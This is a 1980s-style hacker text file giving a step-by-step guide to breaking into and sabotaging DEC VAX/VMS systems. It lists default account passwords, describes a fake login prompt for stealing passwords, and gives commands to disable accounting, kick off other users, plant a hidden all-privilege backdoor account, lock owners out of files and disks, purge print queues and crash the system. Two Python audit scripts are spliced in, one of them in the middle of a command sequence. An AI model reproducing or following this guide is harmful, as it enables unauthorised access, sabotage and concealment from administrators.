Hacking the DEC VAX-11/780 For Phun and Profit

By..... The Nuclear Wastoid

So, you say you want to learn how to hack the VAX-11/780. This phile contains all you need to know to wreak massive havoc and have major fun. This phile is divided into five sections, which are:

1. Getting On
2. Staying On
3. Basics
4. Having Fun
5. Shutting Down and Getting Off.

Each is pretty much self-explanatory, so here goes:

PART I. Getting On.

There are 2 techniques to getting on the system: Hit and Miss, or random passwords, and Cheating. We will, of course, deal with cheating. To cheat yourself onto the system, you can either:

1. use someone else's password, or
2. use a default password.

1. Using Someone Else's Password

Using someone else's password can be both good and bad. It's good because you don't have to create a new account or use a restricted one, so the sysop won't see anything out of the ordinary. It's bad because the person may notice that someone else has been on the system with his pass when he wasn't on the system. It's also not very good because the person may not have high enough privilege for your needs.

To get someone's password is simple if you can get onto the system, even with limited access. Just log onto the sysop's account (or someone else's with high enough privilege) and write a program that just sits there and looks like the logon prompt. Have the program output the names and passes it gets to a remote printer or a file that you can get to later, and then kill itself.

2. Defaults.

There are four default accounts placed on the VAX when it is first set up. These can be changed or deleted, but usually one or two survive. The defaults are:

Name       Password
---------------------------------------------------
SYSTEM     MANAGER or OPERATOR
FIELD      SERVICE or TEST
DEFAULT    USER or DEFAULT
SYSTEST    UETP or SYSTEST

I have found that FIELD SERVICE works most often.

Once you're on the system, you want to make yourself able to do the most damage.
To do this, type:

$ SET PROC/PRIV=ALL          - '$' is the system prompt

If the system responds with some bullshit about your privilege not being high enough, GET ANOTHER PASSWORD. You need full access to have enough phun.

PART II. Staying On.

Okay, you're on the system. Now what? Mass destruction, of course. But first, make sure you'll be able to get back on. The first thing you want to do is:

$ SET ACCOUNTING/DISABLE

This stops the system from keeping track of you. Now type:

$ SHOW USERS

to see who is on the system. If you see your account listed twice, log off. You don't want to be caught because of something stupid like that. If you want to make sure that nobody can interfere with your phun, you should type:

$ SET LOGINS/INTERACTIVE=0

This keeps anybody else from logging onto the computer. Now to kick everybody else off:

$ SHOW USERS                 - the system responds with something like:

            VAX/VMS INTERACTIVE USERS
               23-JUL-1986 09:37:15.54
       Total number of interactive users= 6

Username      Process Name    PID        Terminal
BRUNO         BRUNO           0000026B   TTD3:
FIELD         FIELD           00000FF2   TTC2:
JOHNSON       _TTD5:          0000026D   TTD5:
LINCOLN       LINCOLN         0000026A   TTD2:
CYBERPUNK     CYBERPUNK       000001D8   TTD4:
HARDCORE      HARDCORE        00000263   TTC0:

Now, if you logged on as FIELD, you want to go through and type:

$ STOP/ID=PID                - substituting the number in the PID column for PID, for each person other than you.

This kicks everybody else off the system. It's best if you only do this at night or when usage is low, because if the sysop gets lots of complaints he might catch you.

The next thing you want to do is make sure that you will be able to get back onto the system next time. To do this, type:

$ SET DEF SYS$SYSROOT:[SYSEXE]

This takes you to the SYSEXE directory of the SYS$SYSROOT drive. Now type:

$ RUN AUTHORIZE              - the system will respond:
UAF>                         - now type:
UAF> ADD WASTOID /PASSWORD=ZEDNET /UIC=[099,900] /CPUTIME=0-
/DEVICE=SYS$SYSROOT /DIRECTORY=[SYSEXE] /PRIVS=ALL /NOACCOUNTING
UAF> EXIT

Now- what does this mean?
ADD WASTOID          - adds new record with name=WASTOID
/PASSWORD=ZEDNET     - sets password for new account
/UIC=[099,900]       - sets user identification code for new account
/CPUTIME=0           - tells system you can use it anytime
                       (the '-' after /CPUTIME=0 tells the computer that you're starting a new line)
/DEVICE=SYS$SYSROOT  - sets your home drive
/DIRECTORY=[SYSEXE]  - sets your home directory
/PRIVS=ALL           - gives yourself full access
/NOACCOUNTING        - so the system can't keep track of you

Okay. Now you'll be able to get back on. On to ...

PART III. System Basics

Here are some commands you need to know if you haven't ever used a Vax:

HELP          - brings up a list of all commands, and will explain any of them for you.
SET DEF drive:[directory.sub1.sub2]
              - sets default drive and directory.
TYPE or T     - types a file to the screen.  Format: T FILENAME.EXT
PRINT or PR   - prints a file to the printer. Format: PR FILENAME.EXT
DIR or D      - directory. D shows name, size, protection.
                DIR/PRINT or D/PRINT outputs the directory to printer and screen.
RUN or R      - executes .EXE files: R FILENAME.EXE
@             - executes .COM files: @FILENAME.COM

Okay, now you're ready for:

PART IV: Having Fun.

A. Files

It has got to be the greatest feeling in the world to lock somebody out of his own files. This is hilarious to do, especially if you can watch the person when he finds out. To do this, you use the SET PROTECTION command. Let's say that you want to lock everybody but yourself out of a file called TEST.FIL. You would type:

$ SET PROT=(S:RWED,O,G,W) TEST.FIL

This gives you (the system) full rights, while everybody else (owner, group, and world) has no access rights.

B. Disks

The next most fun thing to do is to lock everybody off of whole disks at a time. To do this to drive DMA1:, you type:

$ DISMOUNT DMA1:             - take DMA1: out of service
$ DEALLOCATE DMA1:           - take DMA1: off line
$ SET PROT=(S,O:R,G,W)/DEVICE/OWNER_UIC[099,900] DMA1:
                             - this tells the system that DMA1: is a private drive of yours.
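The file code (S:RWED,O,G,W) and the device code (S,O:R,G,W) above are the same four-category VMS protection format. As an added example, not from the original phile, here is a small Python parser for that format plus an audit that flags the lock-the-owner-out pattern the text describes; the category and access letters are VMS's own, the audit rules are my own assumptions.

```python
import re
from typing import Dict, List, Optional, Set

# VMS protection categories (the access letters are R, W, E, D).
CATEGORIES = {"S": "system", "O": "owner", "G": "group", "W": "world"}

def parse_protection(code: str) -> Dict[str, Optional[Set[str]]]:
    """Parse a protection code such as '(S:RWED,O,G,W)'.

    Returns category letter -> set of granted access letters. A category
    listed without ':' grants nothing (empty set). A category not listed
    at all is returned as None: SET PROTECTION leaves it unchanged, so
    the auditor must not assume anything about it.
    """
    body = code.strip()
    if body.startswith("(") and body.endswith(")"):
        body = body[1:-1]
    result: Dict[str, Optional[Set[str]]] = {c: None for c in CATEGORIES}
    for field in filter(None, (f.strip().upper() for f in body.split(","))):
        m = re.fullmatch(r"([SOGW])(?::([RWED]*))?", field)
        if not m:
            raise ValueError(f"malformed protection field: {field!r}")
        result[m.group(1)] = set(m.group(2) or "")
    return result

def audit_protection(code: str) -> List[str]:
    """Flag the patterns the text above describes (audit rules are assumed)."""
    prot = parse_protection(code)
    system, owner, world = prot["S"], prot["O"], prot["W"]
    findings: List[str] = []
    if owner == set() and system:
        findings.append("owner has no access while SYSTEM does: owner locked out")
    if world and world & {"W", "D"}:
        findings.append("world can write or delete the object")
    granted = [c for c, bits in prot.items() if bits]
    if len(granted) == 1:
        findings.append(f"only the {CATEGORIES[granted[0]]} category has any access")
    return findings

if __name__ == "__main__":
    for sample in ("(S:RWED,O,G,W)", "(S,O:R,G,W)", "(S:RWED,O:RWED,G:RE,W:RE)"):
        print(sample, parse_protection(sample), audit_protection(sample))
```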
$ ALLOCATE DMA1:             - bring DMA1: back on line
$ MOUNT DMA1:                - put DMA1: back in service.

SHAZAM!! Your own personal drive that nobody else can use.

C. Printers

Say you want to print a file called HACKING.DAT. You type:

$ PR HACKING.DAT

and the system responds that your file is 'pending' on LPA0:. This means that some asshole just put a 1000 page file into the print queue, so your little file won't print until next Tuesday. What you do is:

$ STOP/ABORT LPA0:

This makes the printer stop its current job and kick it off the queue. Now:

$ DELETE/QUEUE LPA0:

This kills everything that was on the queue. Wow! A whole printer to yourself!

Anyway, now I'll leave you alone. I'm sure you can find more ways of having fun on your own, so I'll leave them to you. Oh, by the way- don't skip ....

PART V: Shutting Down and Getting Off

Now say that the system is going to explode in 30 seconds if it's not shut down. Well, being the good samaritan that you are, you'll just have to shut it down for them. There are two quick-and-dirty ways that DEC provided for just such an occasion. #1 works, but #2 is faster and looks nicer.

1. OPCCRASH.

To shut down the system with the OPCCRASH command, simply

$ RUN SYS$SYSTEM:OPCCRASH    - the system will respond:
SYSTEM SHUTDOWN COMPLETE- USE CONSOLE TO HALT SYSTEM

now type:

^P                           - the system will respond:
>>>                          - type:
>>> HALT                     - the system will respond:
HALTED AT 8000708A           - or whatever

2. CRASH system command

To shut down the system with the CRASH command, simply type:

^P
>>> HALT
>>> @CRASH                   - this executes the system command CRASH and displays a big error listing.

Neat, eh? Now you can do everything, except log off, so here goes:

$ LO
WASTOID logged out at 23-JUL-1986 10:27:13.20
$
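Parts I and II describe what this kind of visit leaves behind in the user authorization file: the installation default accounts, and an added account with ALL privileges, accounting switched off and a login directory inside SYSEXE. As an added example, not part of the original phile, here is a Python audit that scans a constructed, simplified account listing (not real AUTHORIZE output) for exactly those traces; the column layout, the sample UICs and the EXPECTED_PRIVILEGED allowlist are assumptions.

```python
from typing import Dict, List

# Account names VMS creates at installation, per Part I of the text above.
DEFAULT_ACCOUNTS = {"SYSTEM", "FIELD", "DEFAULT", "SYSTEST"}
# Accounts this (assumed) site expects to hold ALL privileges.
EXPECTED_PRIVILEGED = {"SYSTEM"}

# Constructed, simplified account listing. This is NOT real AUTHORIZE
# output; the columns and sample values are an assumption for the example.
SAMPLE_LISTING = """\
USERNAME  UIC       PRIVS          ACCOUNTING  DIRECTORY
SYSTEM    [1,4]     ALL            yes         SYS$SYSROOT:[SYSMGR]
FIELD     [1,10]    ALL            yes         SYS$SYSROOT:[SYSMAINT]
BRUNO     [200,1]   TMPMBX,NETMBX  yes         DUA0:[BRUNO]
WASTOID   [99,900]  ALL            no          SYS$SYSROOT:[SYSEXE]
"""

def parse_listing(text: str) -> List[Dict[str, str]]:
    """Turn the whitespace-separated listing into one dict per account."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0].split()
    return [dict(zip(header, ln.split())) for ln in lines[1:]]

def audit_accounts(records: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Return {username: [findings]} for accounts showing the traces Parts I
    and II describe; accounts with nothing to report are omitted."""
    report: Dict[str, List[str]] = {}
    for rec in records:
        name = rec["USERNAME"].upper()
        findings: List[str] = []
        if name in DEFAULT_ACCOUNTS:
            findings.append("installation default account still present; confirm its password was changed")
        if rec["PRIVS"].upper() == "ALL" and name not in EXPECTED_PRIVILEGED:
            findings.append("holds ALL privileges but is not an expected privileged account")
        if rec["ACCOUNTING"].lower() == "no":
            findings.append("accounting disabled: this account's activity is not recorded")
        if rec["DIRECTORY"].upper().endswith("[SYSEXE]"):
            findings.append("login directory is the system executable directory")
        if findings:
            report[name] = findings
    return report

if __name__ == "__main__":
    for user, items in audit_accounts(parse_listing(SAMPLE_LISTING)).items():
        print(user)
        for item in items:
            print("  -", item)
```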